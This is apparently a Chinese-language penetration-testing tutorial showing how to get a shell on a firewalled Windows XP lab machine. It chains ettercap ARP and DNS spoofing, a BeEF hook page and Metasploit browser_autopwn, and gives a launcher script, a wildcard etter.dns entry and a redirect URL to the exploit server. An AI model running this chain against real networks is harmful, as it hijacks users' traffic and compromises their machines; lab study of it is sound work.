在內網滲透方面,最為大眾所知道的就是xp系統的ms08067漏洞,通過這個漏洞可以對未打上補丁的xp系統實現getshell,
但是經過筆者發現,這種漏洞攻擊在被攻擊機開上windows防火牆的時候是沒用的(連ping都會被拒絕),但是arp+dns欺騙仍然是可行的
那么問題來了,我們如何通過內網欺騙來getshell?

在被攻擊機開啟防火牆的時候,可以看到使用ms08067漏洞未能成功利用
但是由於是內網的特性,因此我想到利用dns欺騙結合metasploit進行滲透測試。
首先內網的arp欺騙或者dns欺騙利用ettercap我們可以成功做到,但是如何將metasploit結合起來變得很難。經過搜尋后,發現利用metasploit的browser_autopwn這個滲透測試模塊(這個滲透測試模塊集成了很多瀏覽器的漏洞,當用戶在訪問所給定的頁面后就會執行瀏覽器漏洞,並將payload捆綁在notepad.exe,從而實現后續的滲透攻擊),我們可以將兩者結合起來。這里我們將會用到beef這個xss滲透測試框架。
具體做法是我們首先探測目標主機的網絡流量,判斷其經常所瀏覽的網頁,這里假設是百度(www.baidu.com),之后我們利用dns欺騙將百度網址改為我們所建設的一個網站,這個網站里鑲嵌了一個JavaScript,而這個JavaScript的作用就是xss攻擊,當用戶訪問了這個網頁,就會進入我們設下的“圈套”。
之后我們在beef里就可以對上線主機進行滲透測試,最終獲得shell。這里我們在beef里使用頁面重定向,將用戶訪問的假的頁面重定向到broswer_autopwn所給定的頁面(這里有一個小問題,就是我在進行dns欺騙的時候,為什么不直接將目標主機訪問的網頁重定向到這里所給定的頁面,原先我的初衷是搭建一個釣魚網站,這樣會更具有迷惑性,同時用戶在瀏覽網頁時會占據大量時間,而這些時間我們就可以在beef里進行滲透嘗試,但是后期在構造釣魚網站的時候,那個JavaScript腳本總是不起作用,因此也就隨便搭建了一個網站),這時候metasploit就能探測目標瀏覽器的漏洞從而完成滲透攻擊。
接下來我將演示如何通過dns欺騙配合metasploit成功進行滲透測試。
下面是我寫的一個配置腳本,總的來說一共有三個功能,一打開Apache服務器,即可以讓別人訪問我們的web服務器,二新建一個shell窗口打開ettercap並實現dns欺騙,三激活Beef瀏覽器測試框架並與metasploit相連接,即可以在Beef瀏覽器測試框架中使用metasploit所提供的滲透測試模塊。
#openbeef.sh service apache2 start service postgresql start gnome-terminal -x bash -c "ettercap -T -q -i eth0 -P dns_spoof -M arp /// ///" gnome-terminal -x bash -c "msfconsole -r Beef.rc" sleep 20 cd /usr/share/beef-xss/ ./beef -x

激活Beef,可以看到Hook.js,我在網頁源碼上加入了這個JavaScript腳本,實現了xss自動攻擊。
這個主要是ettercap文本界面,並且對所有的內網主機進行arp欺騙,同時使用dns_spoof插件進行dns欺騙。


這個主要是實現metasploit與Beef的互相連接,在使用Beef框架進行滲透測試時,可以使用metasploit所提供的測試模塊。

這個是beef瀏覽器滲透測試框架的基本頁面,下面我們開始對目標主機進行滲透測試。由於我在etter.dns中寫的是www.*.com A 192.168.73.128,因此目標主機訪問任何頁面都將跳轉到我設置好的帶有js腳本的頁面。

可以看到xp主機訪問的是www.baidu.com,但是經過dns欺騙訪問到了我們先前設置好的界面。同時我們回到beef界面,可以發現這台xp主機已經在滲透測試對象中了,關於他的瀏覽器信息也是一應俱全。

同時在command選項中,我們也可以看到諸多滲透測試模塊,包括metasploit、Social Engineering、Broswer等。

接下來我們利用metasploit中的broswer_autopwn測試模塊,對用戶所訪問的界面進行頁面重定向,將其定向到這個測試模塊給出的頁面(http://192.168.73.128:8080/qWhOf0KS),讓其自動進行瀏覽器的漏洞檢測與滲透。

這時候我們進行頁面重定向,將用戶的界面重定向到http://192.168.73.128:8080/qWhOf0KS。

這時候我們發現xp的瀏覽器頁面變成了正在跳轉,但是在metasploit中已經默默對瀏覽器的漏洞進行探測,並且將payload捆綁到notepad.exe

我們回到metasploit界面發現已經建立了session,並且進程也已經轉移到了安全的地方。


利用meterpreter,我們已經成功返回了一個shell,完成滲透測試。
